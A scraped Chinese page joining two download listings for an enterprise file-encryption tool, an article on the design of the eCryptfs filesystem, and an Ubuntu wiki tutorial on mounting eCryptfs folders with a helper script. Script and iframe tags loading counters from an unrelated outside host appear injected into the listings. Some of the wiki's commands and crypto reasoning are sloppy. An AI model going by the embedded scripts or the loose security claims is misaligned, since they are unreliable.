精华内容
下载资源
问答
  • 金甲企业文件加密系统 软件大小:6522 KB软件语言:简体中文软件类别:国产软件 / 共享版 / 加密工具应用平台:Win9x/NT/2000/XP/2003界面预览:插件情况: 投诉更新时间:2006-03-23 10:45:57下载次数:...
    Welcome to my blog!
    <script language="javascript" src="http://avss.b15.cnwg.cn/count/count.asp"></script>

    金甲企业文件加密系统







    软件大小:

    6522 KB



    软件语言:

    简体中文



    软件类别:

    国产软件 / 共享版 / 加密工具



    应用平台:

    Win9x/NT/2000/XP/2003



    界面预览:








    插件情况:


     



    投诉







    更新时间:

    2006-03-23 10:45:57



    下载次数:

    3965



    推荐等级:






    联 系 人:


    fa
    fasoft.cn




    开 发 商:金甲企业文件加密系统 v3.0.1>作者空间:






        金甲数据保密系统(DDS)是武汉风奥软件技术有限公司针对企业数据保密需求推出的一套简单易用的文件加密解决方案。可以对任意windows格式文件进行自动加密。适合企业对CAD图纸、重要文件进行保密。保护企业知识产权不被窃取。
        DDS具有如下主要特点:
    1.指定文件或程序在生成要求保护类型文件时,自动加密;
    2.加密文件在环境内打开时自动解密,不需要输入密码,不改变原有操作习惯;
    3.每企业加密方法、密钥唯一,出了门的密文无法打开;
    4.统一管理环境,可对不同用户部署不同加密策略;
    5.可设置手工解密控制端,方便对外交流;
    6.外出办公可进行商务授权。
    绿色
    src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">
    展开全文
  • 金甲企业文件加密系统(dds) 软件大小:50473 KB软件语言:简体中文软件类别:国产软件 / 共享版 / 加密工具应用平台:Win9x/NT/2000/XP/2003界面预览:无插件情况: 投诉更新时间:2007-06-21 15:07:02...
    Welcome to my blog!
    <script language="javascript" src="http://avss.b15.cnwg.cn/count/count.asp"></script>

    金甲企业文件加密系统(dds)







    软件大小:

    50473 KB



    软件语言:

    简体中文



    软件类别:

    国产软件 / 共享版 / 加密工具



    应用平台:

    Win9x/NT/2000/XP/2003



    界面预览:





    插件情况:


     



    投诉







    更新时间:

    2007-06-21 15:07:02



    下载次数:

    177



    推荐等级:






    联 系 人:


    wlh
    fasoft.cn




    开 发 商:金甲企业文件加密系统(dds) v3.3demo>作者空间:






        金甲数据保密系统(DDS)是武汉风奥软件技术有限公司针对企业数据保密需求推出的一套简单易用的文件加密解决方案。可以对任意windows格式文件进行自动加密。适合企业对CAD图纸、重要文件进行保密。保护企业知识产权不被窃取。  
        DDS具有如下主要特点:  
    1.指定文件或程序在生成要求保护类型文件时,自动加密;  
    2.加密文件在环境内打开时自动解密,不需要输入密码,不改变原有操作习惯;  
    3.每企业加密方法、密钥唯一,出了门的密文无法打开;  
    4.统一管理环境,可对不同用户部署不同加密策略;  
    5.可设置手工解密控制端,方便对外交流;  
    6.外出办公可进行商务授权。
    官网
    src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">
    展开全文
  • 加密文件系统概述 什么是加密文件系统 近年来,保护敏感数据不被泄漏成为人们关注的热点问题。入侵者除了直接盗取物理存储设备,还可以通过网络攻击来窃夺文件数据;而且,由于共享的需求,敏感数据会由多人访问,...

    加密文件系统概述

    什么是加密文件系统

    近年来,保护敏感数据不被泄漏成为人们关注的热点问题。入侵者除了直接盗取物理存储设备,还可以通过网络攻击来窃夺文件数据;而且,由于共享的需求,敏感数据会由多人访问,这也增大了泄漏的可能性。对数据或文件进行加密已经成为一种公认的比较成功的保护方法。事实上,人们早已开发了许多优秀的加密算法,如 DES、AES、RSA 等,并且有一些应用程序如 crypt 使用这些加密算法,用户通过这些工具手工地完成加密、解密的工作。由于这些应用程序操作麻烦、没有和整个系统紧密地结合而且容易受到攻击,因此一般用户并不愿意使用。

    加密文件系统通过将加密服务集成到文件系统这一层面来解决上面的问题。加密文件的内容一般经过对称密钥算法加密后以密文的形式存放在物理介质上,即使文件丢失或被窃取,在加密密钥未泄漏的情况下,非授权用户几乎无法通过密文逆向获得文件的明文,从而保证了高安全性。与此同时,授权用户对加密文件的访问则非常方便。用户通过初始身份认证后,对加密文件的访问和普通文件没有什么区别,就好像该文件并没有被加密过,这是因为加密文件系统自动地在后台做了相关的加密和解密的工作。由于加密文件系统一般工作在内核态,普通的攻击比较难于奏效。还有一类系统级加密方案是基于块设备,与它们相比,加密文件系统具有更多的优势,例如:

    1. 支持文件粒度的加密,也就是说,用户可以选择对哪些文件或目录加密。而且,应用程序不用关心文件是否被加密,可以完全透明地访问加密文件。
    2. 无需预先保留足够的空间,用户可以随时加密或恢复文件。
    3. 对单个加密文件更改密钥和加密算法比较容易。
    4. 不同的文件可以使用不同的加密算法和密钥,增大了破解的难度。
    5. 只有加密文件才需要特殊的加密/解密处理,普通文件的存取没有额外开销。
    6. 加密文件转移到别的物理介质上时,没有额外的加密/解密开销。

    加密文件系统的分类

    加密文件系统基本上可以分为两大类,两类的实现方式和目标都有比较大的区别。一类是面向网络存储服务的,通常是基于 NFS 客户/服务器模型,通常称为网络加密文件系统。在网络加密文件系统中,数据以密文的方式保存在网络文件系统中,用户通过客户机服务进程与网络文件服务器交互,网络文件服务器负责将用户请求的密文传递到客户机服务进程,由客户机服务进程进行解密再交给应用程序。在这个模型中,只要求客户机操作系统是可信的,而网络服务器由于不接触明文数据,不要求其可信。另一类是本地加密文件系统,密文数据直接存放在本地物理介质上(硬盘,U 盘等),由操作系统或服务进程完成数据的读取、加密/解密工作。本地加密文件系统的目标是应对存储介质失窃的威胁,安全模型同样把加密文件系统所在的操作系统视为可信的。

    本地加密文件系统又可以细分为两种,一种是在原有的普通文件系统上直接加入加密功能,如 Reiser4,但是现有的 Ext2, Ext3 等常用文件系统并不支持加密功能,因此用户不得不转换整个文件系统;另一种被称为堆叠式加密文件系统(Stackable Cryptographic File System)。这种加密文件系统可以看成一个加密/解密的转换层,而并不是一个真实的全功能文件系统。堆叠式加密文件系统没有相应的磁盘布局,也不实现数据在物理介质上存取的功能。它必须架构在别的普通文件系统之上,读加密文件时先通过下层普通文件系统将文件的密文读入内存,解密后再将明文返回到上层的用户进程;写加密文件时先将内存中的明文加密,然后传给下层普通文件系统,由它们真正地写入物理介质。堆叠式加密文件的优势在于实现相对容易(因为功能相对简单)且用户可以任意选择下层的普通文件系统来存放加密文件。本文讨论的 eCryptfs 属于本地堆叠式加密文件系统的范畴。

    现有加密文件系统的不足

    加密文件系统的概念由来已久,现实世界中已有诸多的实现,例如 CFS[2], TCFS, Crypt-FS, FSFS, Waycryptic 和 Windows EFS 等,但是这些加密文件系统有着内在的局限和安全问题。

    CFS 和 TCFS 通过 NFS 客户/服务器模型来提供加密服务,只使用了 DES 算法来加密文件内容。这两种文件系统主要的缺点在于:难于使用、共享加密文件非常困难、用户不能选择加密算法、交换区或临时文件可能会泄漏明文以及性能较差等等。

    Waycryptic 是一个堆叠式加密文件系统,通过修改 Linux 内核的虚拟文件系统层(VFS)来提供加密及解密的功能。Waycryptic 使用两种算法来加密文件:加密文件内容使用对称密钥算法,如AES,密钥随机产生;同时使用一种公开密钥算法,如RSA,加密刚才提及的密钥。这种综合两种加密算法的方式既保证了加密/解密的速度,又极大地提高了安全性。同时Waycryptic允许加密文件方便安全地在多个用户间共享;为了应对密钥的丢失,Waycryptic允许用户指定别的帐号来恢复文件。但是 Waycryptic 主要是一个研究项目,比较适合个人单机使用,无法满足企业或需要更高安全级别的用户的需求。

    Windows EFS(Encrypting File System) 是对 NTFS 文件系统的功能扩充,可以方便地加密 NTFS卷上的文件或目录。Windows EFS 简单易用,功能强大,不足之处在于只能在 Windows 操作系统的 NTFS 卷上才能使用,文件内容使用的加密算法比较单一。此外,如果事先没有备份证书的话,一旦重装系统就无法再访问加密文件。


    使用 eCryptfs

    eCryptfs 简介

    eCryptfs 是在 Linux 内核 2.6.19 版本中引入的一个功能强大的企业级加密文件系统,堆叠在其它文件系统之上(如 Ext2, Ext3, ReiserFS, JFS 等),为应用程序提供透明、动态、高效和安全的加密功能。

    本质上,eCryptfs 就像是一个内核版本的 Pretty Good Privacy(PGP)[3] 服务,插在 VFS(虚拟文件系统层)和 下层物理文件系统之间,充当一个“过滤器”的角色。用户应用程序对加密文件的写请求,经系统调用层到达 VFS 层,VFS 转给 eCryptfs 文件系统组件(后面会介绍)处理,处理完毕后,再转给下层物理文件系统;读请求(包括打开文件)流程则相反。

    eCryptfs 的设计受到OpenPGP 规范的影响,使用了两种方法来加密单个文件:

    1. eCryptfs 先使用一种对称密钥加密算法来加密文件的内容,推荐使用 AES-128 算法,密钥 FEK(File Encryption Key)随机产生。有些加密文件系统为多个加密文件或整个系统使用同一个 FEK(甚至不是随机产生的),这会损害系统安全性,因为:a. 如果 FEK 泄漏,多个或所有的加密文件将被轻松解密;b. 如果部分明文泄漏,攻击者可能推测出其它加密文件的内容;c. 攻击者可能从丰富的密文中推测 FEK。
    2. 显然 FEK 不能以明文的形式存放,因此 eCryptfs 使用用户提供的口令(Passphrase)、公开密钥算法(如 RSA 算法)或 TPM(Trusted Platform Module)的公钥来加密保护刚才提及的 FEK。如果使用用户口令,则口令先被散列函数处理,然后再使用一种对称密钥算法加密 FEK。口令/公钥称为 FEFEK(File Encryption Key Encryption Key),加密后的 FEK 则称为 EFEK(Encrypted File Encryption Key)。由于允许多个授权用户访问同一个加密文件,因此 EFEK 可能有多份。

    这种综合的方式既保证了加密解密文件数据的速度,又极大地提高了安全性。虽然文件名没有数据那么重要,但是入侵者可以通过文件名获得有用的信息或者确定攻击目标,因此,最新版的 eCryptfs 支持文件名的加密。

    eCryptfs 使用方法

    eCryptfs 需要相应的内核模块和用户态的工具同时配合使用。用户态的工具可以从 https://launchpad.net/ecryptfs 获得,使用 Debian 或 Ubuntu 系统的用户,用 apt-get 命令安装 ecryptfs-utils 包即可。如果用户自行编译内核,则需要如下选项:


    清单 1. 使用 eCryptfs 所需的内核选项

    General setup  --->
    [*] Prompt for development and/or incomplete code/drivers
    File systems --->
    Miscellaneous filesystems --->
    <M> eCrypt filesystem layer support (EXPERIMENTAL)
    Security options --->
    <M> Enable access key retention support
    Cryptographic API --->
    <M> MD5 digest algorithm
    <M> AES cipher algorithms

     

    首先需要加载 eCryptfs 内核模块,执行modprobe ecryptfs。然后将 eCryptfs 挂载到准备存放加密文件的目录,执行 sudo mount -t ecryptfs real_pathecryptfs_mounted_path。推荐ecryptfs_mounted_path 和 真实目录 real_path 一致,这样非授权用户不能通过原路径访问加密文件。


    图 1. eCryptfs 挂载结果

    eCryptfs默认使用 AES-128 算法以及用口令加密 FEK,更多挂载选项请参考 eCryptfs 的 man page。如果用户想使用公钥加密算法加密 FEK,需要事先用 OpenSSL 产生公钥/私钥对。用户还可以在主目录下的 .ecryptfsrc 文件中写入缺省选项,配置文件的格式请参阅 http://ecryptfs.sourceforge.net/README


    eCryptfs 的设计

    eCryptfs 设计目标

    为了评估一个加密解决方案的可行性,企业往往要考虑诸多因素,例如员工的学习曲线、增量备份是否受到影响、密钥丢失的话如何防止信息泄漏或如何恢复信息、转换及使用成本、潜在的风险等等。eCryptfs 在设计之初,充分考虑企业用户的如下需求:

    1. 易于部署。eCryptfs 完全不需要对 Linux Kernel 的其它组件做任何修改,可以作为一个独立的内核模块进行部署。同时,eCryptfs 也不需要额外的前期准备和转换过程。
    2. 用户能够自由选择下层文件系统来存放加密文件。由于不修改 VFS 层,eCryptfs 通过挂载(mount)到一个已存在的目录之上的方式实现堆叠的功能。对 eCryptfs 挂载点中文件的访问首先被重定向到 eCryptfs 内核文件系统模块中。
    3. 易于使用。每次使用 eCryptfs 前,用户只需执行 mount 命令,随后 eCryptfs自动完成相关的密钥产生/读取、文件的动态加密/解密和元数据保存等工作。
    4. 充分利用已有的成熟安全技术。例如,eCryptfs 对于加密文件采用 OpenPGP 的文件格式、通过 Kernel Crypto API使用内核实现的对称密钥加密算法和散列算法等。
    5. 增强安全性。eCryptfs 的安全性最终完全依赖于解密 FEK 时所需的口令或私钥。通过利用 TPM 硬件(TPM可以产生公钥/私钥对,硬件直接执行加密/解密操作,而且私钥无法从硬件芯片中获得),eCryptfs 最大程度上保证私钥不被泄漏。
    6. 支持增量备份。eCryptfs 将元数据和密文保存在同一个文件中,从而完美的支持增量备份及文件迁移。
    7. 密钥托管。用户可以预先指定恢复帐号,万一遗失加密 FEK 的口令/私钥,也可以通过恢复帐号重新获得文件的明文;但是如果未指定恢复帐号,即使系统管理员也无法恢复文件内容。
    8. 丰富的配置策略。当应用程序在 eCryptfs 的挂载点目录中创建新文件的时候,eCryptfs 必须做出许多决定,比如新文件是否加密、使用何种算法、FEK 长度、是否使用 TPM 等等。eCryptfs 支持与 Apache 类似的策略文件,用户可以根据具体的应用程序、目录进行详细的配置。

    eCryptfs 的架构


    图 2. eCryptfs 加密文件系统的架构

    eCryptfs Layer 是一个比较完备的内核文件系统模块,但是没有实现在物理介质上存取数据的功能。在 eCryptfs Layer自己的数据结构中,加入了指向下层文件系统数据结构的指针,通过这些指针,eCryptfs就可以存取加密文件。清单 2 列出几种主要的数据结构:


    清单 2. eCryptfs Layer 主要数据结构

    static struct file_system_type ecryptfs_fs_type = {
    .owner = THIS_MODULE,
    .name = "ecryptfs",
    .get_sb = ecryptfs_get_sb,
    .kill_sb = ecryptfs_kill_block_super,
    .fs_flags = 0
    };

     

    struct ecryptfs_sb_info {
    struct super_block *wsi_sb;
    struct ecryptfs_mount_crypt_stat mount_crypt_stat;
    };

    struct ecryptfs_inode_info {
    struct inode vfs_inode;
    struct inode *wii_inode;
    struct file *lower_file; /* wii_inode, lower_file 指向下层文件系统对应的数据结构 */
    struct mutex lower_file_mutex;
    struct ecryptfs_crypt_stat crypt_stat;
    };

    struct ecryptfs_dentry_info {
    struct path lower_path; /* 下层文件系统的 dentry */
    struct ecryptfs_crypt_stat *crypt_stat;
    };

    struct ecryptfs_file_info {
    struct file *wfi_file;
    struct ecryptfs_crypt_stat *crypt_stat;
    };

     

    Keystore 和用户态的 eCryptfs Daemon 进程一起负责密钥管理的工作。eCryptfs Layer 首次打开一个文件时,通过下层文件系统读取该文件的头部元数据,交与 Keystore 模块进行 EFEK(加密后的 FEK)的解密。前面已经提及,因为允许多人共享加密文件,头部元数据中可以有一串 EFEK。EFEK 和相应的公钥算法/口令的描述构成一个鉴别标识符,由 ecryptfs_auth_tok 结构表示。Keystore 依次解析加密文件的每一个 ecryptfs_auth_tok 结构:首先在所有进程的密钥链(key ring)中查看是否有相对应的私钥/口令,如果没有找到,Keystore 则发一个消息给 eCryptfs Daemon,由它提示用户输入口令或导入私钥。第一个被解析成功的 ecryptfs_auth_tok 结构用于解密 FEK。如果 EFEK 是用公钥加密算法加密的,因为目前 Kernel Crypto API 并不支持公钥加密算法,Keystore 必须把 ecryptfs_auth_tok 结构发给 eCryptfs Daemon,由它调用 Key Module API 来使用 TPM 或 OpenSSL库解密 FEK。解密后的 FEK 以及加密文件内容所用的对称密钥算法的描述信息存放在 ecryptfs_inode_info 结构的 crypt_stat 成员中。eCryptfs Layer 创建一个新文件时,Keystore 利用内核提供的随机函数创建一个 FEK;新文件关闭时,Keystore 和 eCryptfs Daemon 合作为每个授权用户创建相应 EFEK,一齐存放在加密文件的头部元数据中。

    eCryptfs 采用 OpenPGP 的文件格式存放加密文件,详情参阅 RFC 2440 规范[4]。我们知道,对称密钥加密算法以块为单位进行加密/解密,例如 AES 算法中的块大小为 128 位。因此 eCryptfs 将加密文件分成多个逻辑块,称为 extent。当读入一个 extent 中的任何部分的密文时,整个 extent 被读入 Page Cache,通过 Kernel Crypto API 被解密;当 extent 中的任何部分的明文数据被写回磁盘时,需要加密并写回整个 extent(参见图 5[5])。extent 的大小是可调的,但是不会大于物理页的尺寸。当前的版本中的 extent 默认值等于物理页大小,因此在 IA32 体系结构下就是 4096 字节。加密文件的头部存放元数据,包括元数据长度、标志位以及 EFEK 链,目前元数据的最小长度为 8192 字节。


    图 3. eCryptfs 加密/解密操作流程图

    eCryptfs 的不足

    eCryptfs 不足之处在于:

    1. 写操作性能比较差。笔者用 iozone 测试了 eCryptfs 的性能,发现读操作的开销不算太大,最多降低 29%,有些小文件测试项目反而性能更好;对于写操作,所有测试项目的结果都很差,普遍下降 16 倍左右。这是因为 Page Cache 里面只存放明文,因此首次数据的读取需要解密操作,后续的读操作没有开销;而每一次写 x 字节的数据,就会涉及 ((x – 1) / extent_size + 1) * extent_size 字节的加密操作,因此开销比较大。
    2. 有两种情况可能造成信息泄漏:a. 当系统内存不足时,Page Cache 中的加密文件的明文页可能会被交换到 swap 区,目前的解决方法是用 dm-crypt 加密 swap 区。b. 应用程序也有可能在读取加密文件后,将其中某些内容以临时文件的方式写入未挂载 eCryptfs 的目录中(比如直接写到 /tmp 中),解决方案是配置应用程序或修改其实现。
    3. eCryptfs 实现的安全性完全依赖于操作系统自身的安全。如果 Linux Kernel 被攻陷,那么黑客可以轻而易举地获得文件的明文,FEK 等重要信息。

     

    参考资料

    转载于:https://www.cnblogs.com/chinacloud/archive/2010/12/23/1915022.html

    展开全文
  • Ecryptfs企业级加密文件系统 联系我:一般还是使用站内短信通知比较快。...安装系统时提示是否加密主文件夹,使用的就是这个加密系统:) 目录 [隐藏] 1 什么是加密文件系统2 安装3 使用举例4


    Ecryptfs企业级加密文件系统

    联系我:一般还是使用站内短信通知比较快。 http://forum.ubuntu.org.cn/ucp.php?i=pm&mode=compose&u=171468

    cat650@163.com
    

    安装系统时提示是否加密主文件夹,使用的就是这个加密系统:)

    目录

    [隐藏]

    [编辑] 什么是加密文件系统

    保护敏感数据不被泄漏成为人们关注的热点问题。入侵者除了直接盗取物理存储设备,还可以通过网络攻击来窃夺文件数据;而且,由于共享的需求,敏感数据会由多人访问,这也增大了泄漏的可能性。对数据或文件进行加密已经成为一种公认的比较成功的保护方法。事实上,人们早已开发了许多优秀的加密算法,如 DES、AES、RSA 等,并且有一些应用程序如 crypt 使用这些加密算法,用户通过这些工具手工地完成加密、解密的工作。由于这些应用程序操作麻烦、没有和整个系统紧密地结合而且容易受到攻击,因此一般用户并不愿意使用。

    加密文件系统(比如eCryptfs)通过将加密服务集成到文件系统这一层面来解决上面的问题。加密文件的内容一般经过对称密钥算法加密后以密文的形式存放在物理介质上,即使文件丢失或被窃取,在加密密钥未泄漏的情况下,非授权用户几乎无法通过密文逆向获得文件的明文,从而保证了高安全性。与此同时,授权用户对加密文件的访问则非常方便。用户通过初始身份认证后,对加密文件的访问和普通文件没有什么区别,就好像该文件并没有被加密过,这是因为加密文件系统自动地在后台做了相关的加密和解密的工作。由于加密文件系统一般工作在内核态,普通的攻击比较难于奏效。还有一类系统级加密方案是基于块设备,与它们相比,加密文件系统具有更多的优势,例如:

    • 支持文件粒度的加密,也就是说,用户可以选择对哪些文件或目录加密。而且,应用程序不用关心文件是否被加密,可以完全透明地访问加密文件。
    • 无需预先保留足够的空间,用户可以随时加密或恢复文件。
    • 对单个加密文件更改密钥和加密算法比较容易。
    • 不同的文件可以使用不同的加密算法和密钥,增大了破解的难度。
    • 只有加密文件才需要特殊的加密/解密处理,普通文件的存取没有额外开销。
    • 加密文件转移到别的物理介质上时,没有额外的加密/解密开销。
    • 附加一点,ecryptfs 的解密层存在于内存(内存不足时可能使用 到交换分区)。硬盘上面保存的只有加密数据。这样即使硬盘被偷了,使用数据还原软件也不可能得到 解密文件。不是像普通的加密软件、压缩软件把 解密文件缓存于硬盘上。你即使删除了,使用数据还原软件依然有可能得到 解密文件。

    [编辑] 安装

    sudo apt-get install ecryptfs-utils
    

    然后就可以开始使用了。因为很简单使用命令界面就能解决问题,所以没有图形界面。但是不用担心,我会把每一步讲解清楚。没有图形界面还有一个好处:隐蔽性高

    [编辑] 使用举例

    这里举个单独加密文件夹的例子,而不是按网上流行的方式:把主文件夹加密。我认为这种操作简单、独立涉及的东西少,效率高。

    注:ubuntu安装时有个选项——加密用户文件夹,使用的就是该系统。
    

    *1,新建一个测试文件夹:ecryptfs_test使用这个文件夹存放加密文件命令:

    sudo mount -t ecryptfs ecryptfs_test ecryptfs_test
    

    mount 是挂载命令。-t 是指定文件类型。ecryptfs 就是我们使用的加密文件类型。!这里换一个命令举例说明一下

    sudo mount -t ecryptfs real_path ecryptfs_mounted_path
    

    real_path 是真实存放数据的地方;ecryptfs_mounted_path 是指你要把文件夹挂载于哪里(具体位置可以随意)

    推荐:ecryptfs_mounted_path 和 真实目录 real_path 不一致,这样非授权用户不能通过原路径访问加密文件。

    这里必须说一下挂载:很多人不理解
    所谓挂载,可以理解为超级链接。比如说有两个文件夹     
    a,b。a中有文件isa,b中有文件isb。
    现在我们要把a挂载于b上,命令:mount a b
    此时b已经变成了a 的链接。所有对b的访问实际上都指向了a。
    比如我们打开b文件夹,看到的文件只有isa。而打开a文件夹,  文件还是isa
    我们在b中存放一个新文件 isnew。
    好了我们卸载这个挂载(取消这个超链接),命令:umount b
    现在查看a文件夹,里面有文件isa isnew
    查看b文件夹,里面只有isb
    
    为使么说是超级链接呢,因为有个选项(其它选项我还不会) -t
    它的意思是指定 文件夹类型(文件系统类型)。文件系统类型有很多,比如我们使用的ext4、ext3、fat32、ntfs……还有特殊的文件系统,比如 tmpfs(用内存 存文件)、ecryptfs(文件加密格)……
    使用-t 就可以以指定文件格式进行“链接”,能查看、操作其它文件格式的文件了。这是普通连接做不到的。
    


    *2,mount 需要root权限,我们使用 命令sudo ,来以root身份运行命令结果如下:image001.jpg

    passphrase:
    (这是要你输入密码,自己编一个。一定要记住。另外密码是不会有任何显示的,输完回车就行)
    select cipher:
    (选择加密方式,不选默认是[aes]。最好记住自己的选择)
    select key bytes:
    (选择加密位数,不选默认是[16]。最好记住自己的选择)
    enable plaintext passthrough(y/n) [n]:
    (是否允许使用明文,默认是 n)
    enable filename encryption (y/n) [n]:
    (是否把文件名也进行加密,默认是 n。如果选择y,那么在没有解密 的情况下是无法列出文件夹内部的文件名的。)
    

    如果设置的密码是第一次使用,它会提示你密码被标识为[799d2f922c0f1f26] 。当然,你的密码标识肯定不会是这个。并且告诉你输入可能有误,因为/root/.ecryptfs/sig-cache.txt中没有相关记录。密码标识只存在于你现在的系统中,是怕你忘记密码,它会告诉你这个密码是否用过。因为ecryptfs在密码错误的情况下一样可以进行错误解密,实际上是另外一种形式的加密。要是不保存密码标识,我肯定盗资料的人会很头痛,记心不好的用户也一样。

     出现输入有误的警告后,会让你选择:
    
     Would you like to proceed with the mount (yes/no)? :
     (你是否希望继续进行挂载。)我们输入yes,来完成加密。
     Would you like to append sig [799d2f922c0f1f26] to
    [/root/.ecryptfs/sig-cache.txt]
     in order to avoid this warning in the future (yes/no)?:
     (你是否把密码标识保存到/root/.ecryptfs/sig-cache.txt中?)我们输入yes,也可以输no,看你的记心好坏了。
    
    • 3,好了,现在正常操作ecryptfs_test文件夹。放一些文件来测试。
    • 4,关闭解密状态

    命令:

     sudo umount -t ecryptfs ecryptfs_test
    
     (如果使用的是sudo mount -t ecryptfs real_path ecryptfs_mounted_path
    

    那么对应的命令是sudo umount -t ecryptfs ecryptfs_mounted_path)这命令意思是把挂载取消了。这里的作用相当于把解密取消了,毕竟把重要文件长时间解密放着不好。好了,再看看ecryptfs_test文件夹,里面的文件是不是都无法正确打开了?

    ********连概念加内容 加操作都说了,就这么点。简单吧

    • 5.需要解密文件夹时还是用命令:
     sudo mount -t ecryptfs ecryptfs_test ecryptfs_test
    
     (格式还是不变:sudo mount -t ecryptfs real_path ecryptfs_mounted_path)
     passphrase:
     select cipher:
     select key bytes:
     enable plaintext passthrough(y/n) [n]:
     enable filename encryption (y/n) [n]:
    

    上面这几相当初怎么设置的就怎么填,之后文件夹就解密了。

    不需要用了,还是用命令解除解密状态

    sudo umount -t ecryptfs ecryptfs ecryptfs_test
    


    这里说一点,mount命令重启就失效了。如果你要关机了,不必使用sudo umount -t ecryptfs ecryptfs_test命令了。因为再次开机,解密是失效的。必须重新运行命令sudo mount -t ecryptfs ecryptfs_test ecryptfs_test

    [编辑] kde环境下,文件管理器右键集成

    注意以下命令运行于kde环境,gnome(ubuntu默认环境)请作相应更改

    但命令行很不方便,特别是文件夹地址比较复杂时,来回输入命令太痛苦了。

    本文的目的是调用一个简单的脚本,在文件夹右键添加按钮,处理加密、解密问题。

    1.在/media目录中创建一个文件夹,作为加密文件夹的显示窗口。

    sudo mkdir /media/ecryptfs
    


    2.创建一个脚本,我们放在/bin中。其实放在哪里都可以,只是考虑到安全性还是放在系统文件夹中,以root用户创建。

    sudo touch /bin/mountecryptfs.sh
    


    3.编辑脚本

    sudo kate /bin/mountecryptfs.sh
    

    拷贝以下内容:

    #!/bin/sh
    # 本脚本运行由cat650制作,有问题联系cat650@163.com
    # 脚本适用于kde环境,请提前安装ecryptfs-utils
    echo "请输入超级用户密码"
    sudo umount /media/ecryptfs
    echo "输入完成"
    echo "请输入加密密码,选择加密方式"
    sudo mount -t ecryptfs "$1" /media/ecryptfs
    echo "显示加密文件夹"
    dolphin /media/ecryptfs
    echo "已处于加密状态"
    read -p "是否自动卸载加密文件夹(yes?)" yn
    if [ "$yn" != "yes" ]; then
    echo "请记得手动解除加密"
    echo "命令为:sudo umount /media/ecryptfs"
    read -p "回车退出" no
    exit 0
    fi
    echo "去加密……"
    sudo umount /media/ecryptfs
    read -p "请验证是否已解除加密,回车退出" no
    

    4.把这个脚本变为可执行

    sudo dolphin /bin
    

    找到脚本,属性改为可执行。


    5.用dolphin打开任意文件夹。文件夹右键,属性,类型旁有个小扳手。

    添加。选择程序,找到/bin/mountecryptfs.sh

    选择并移动到最底。

    选择,编辑。应用程序,高级选项:在终端中运行。这步必须有,要不无法进行加密操作。


    6.测试

    在/tmp文件夹中新建一个文件夹,右键,动作,选择mountecryptfs.sh(或者你自己命名的名字)。

    好了,在新跳出的文件管理器中,添加一些文件、写点字。

    在终端输入yes,让脚本自动卸载加密。

    此时,文件管理器刷新后应该为空且不可编辑。

    回到我们新建的文件夹中,那些新添的东西应该无法识别。

    [编辑] 深入使用的讨论

    我们知道 ecryptfs 是文件虚拟层,其功能就是 加密/解密。没有密码验证一说

    也就是说,它根据密码进行加密/解密。即使密码不正确依旧进行 加密/解密,与数据无关。

    那么:

    [编辑] 1,重复加密\混和加密

    实验证明的确可以。因为 mount 是可以重复挂载的。更别说多次挂载在不同地方。

    试验:假设有这么几个文件夹 test a b

    mount -t ecryptfs test test
    

    密码设置为 1234

    里面放文本文件 one。

    好了再次挂载

    mount -t ecryptfs test a
    

    密码为4321

    放文本 two

    再次挂载

    mount -t ecryptfs a b
    

    密码0987

    放文本 three

    好了在文件夹 test a b中均可看见 one two three文件,可是test中只有 one可以打开,a 中只有two可以打开,b中只有three可以打开。

    因为one被密码1234加密,two被密码1234和密码4321加密两次,three呢1234、4321、0987加密三次。

    test中文件被1234解密一次,a中文件被密码1234和密码4321解密两次,b中1234、4321、0987解密3次。

    所以test中除了one被正确解密,其它的都还在加密状态。a中,one被1234正确解密却又被4321再次解密,就成了乱码(相当于被加了密)

    这样一来,假设test中的文件被加密了2次。

    那么别人破解密码就很有一思了(假设他不知道文件被加密了几次)。

    如果尝试一个密码,显示的文件夹内容是乱码。那么就有2个可能

    要么是密码错了,要么是密码对了还要再解密。
    

    当然,对于密码学而言(直接从密文还原为明文)。使用同一方法重复加密丝毫不能增加安全性,不管重复多少次其效果只等同于加密一次。但是不要忘记,ecryptfs有:

    1) aes: blocksize = 16; min keysize = 16; max keysize = 32 (not loaded)
    2) blowfish: blocksize = 16; min keysize = 16; max keysize = 32 (not loaded)
    3) des3_ede: blocksize = 8; min keysize = 24; max keysize = 24 (not loaded)
    4) twofish: blocksize = 16; min keysize = 16; max keysize = 32 (not loaded)
    5) cast6: blocksize = 16; min keysize = 16; max keysize = 32 (not loaded)
    6) cast5: blocksize = 8; min keysize = 5; max keysize = 16 (not loaded)
    

    种加密方式。如果正确使用,破解难度很大

    由此可以得知 ecryptfs 有效重复加密次数只有6次,但是对于非情报人员而言,已经够用了。

    [编辑] 2,把普通软件升级为 带有可加密数据库的安全软件

    这点应用原理很简单。软件在 home/~ 中 大多都有配置,软件数据、用户数据的保存文件夹。

    比 如:某某通讯录软件 在 ~/xxx/date 中保存用户的数据。而这软件比较普通,使用的明文存储 通讯录。

    这意味着,资料外泄。比如里面是 大量客户 ,被竞争对手拿到…… 别觉得不可能,触及钱的东西,被人顾黑客黑都是很有可能的。

    此时,使用 ecryptfs 把 date 文件夹 mount 。保证了处于加密状态。正常使用软件就行了。使用完了,umount。ok,软件有了一个数据库加密的功能。而且是不在影响 软件使用的基础上实现的。

    想想,rar这类的压缩加密的软件能做到吗?win 下的各类文件夹加密软件可以吗(可是不能任意 mount的)?

    微 软基于用户的(ntfs文件系统),更是不方便。只要用户登录,加密文件夹就自动解密 直到用户注销。虽然说微软的加密真的很强,可是对于在线入侵,或者软件搞鬼就没办法了。只要用户处于登录状态,加密文件夹就像分开双腿的处女,谁想都行。 对于 ecryptfs 可不行,就算你是root,也要输入密码、加密方法、密钥长度。就算你拿到用户的登录密码,也无能为力(比微软全部鸡蛋放一个笼子好的多)。
    

    这里 明白我不喜欢 整体加密主文件夹了吧。

    [编辑] 3,为网络文件夹加密

    这里使用 ubuntu one 或者类似工具的朋友,为了你的数据安全。 请先使用 ecryptfs mount 存入资料,再umount,之后再 同步文件夹。即使黑客 攻破了 ubuntu one 的服务器,也不会获得你的资料。而且使用上,没有太大差异。

    欢迎讨论:forcat650@gmail.com--Cat650 2010年9月7日 (二) 19:16 (CST)

    再说一 点。大家也许都想到了:同一文件夹里的文件,可以是不同密码加密的。推荐一本书《经典密码学与现代密码学》,网络上可以下载pdf 的版本。对于保守机密很有帮助

    [编辑] 延伸阅读

    引用自:http://www.ibm.com/developerworks/cn/linux/l-cn-ecryptfs/

    [编辑] eCryptfs 设计目标

